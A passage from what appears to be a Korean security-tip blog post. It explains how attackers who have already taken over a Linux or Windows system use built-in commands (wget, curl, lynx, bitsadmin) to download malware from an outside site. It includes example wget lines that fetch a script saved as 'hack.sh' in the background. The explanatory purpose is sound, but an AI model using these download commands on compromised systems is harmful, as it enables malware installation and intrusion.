SYSTEM/TIP
악성코드 파일 다운로드 명령어 / wget / curl / lynx / bitsadmin
해커가 보안 취약점을 이용하여 시스템 장악후 외부 사이트로 부터 어떤 방법을 이용하여 악성코드를 다운로드 할까요? 가장 보편적인 방법으로는 OS 자체 명령어를 사용 하여 악성코드를 다운로드 합니다. 전제 조건 보안 취약점을 이용하여 시스템 장악 완료 OS (LINUX, Windows) 기본 명령어를 제어 할수 있는 권한 획득 피해 서버 아웃바운드(인터넷) 네트워크 통신 가능 상태 Linux OS wget 명령어 파일 다운로드 wget https://rootkey.tistory.com/code.sh wget https://rootkey.tistory.com/code.sh -P files/download -O hack.sh -P 디렉토리 저장 -O 파일명 지정 -b 백그라운드 실행 curl 명령어 파일 다운..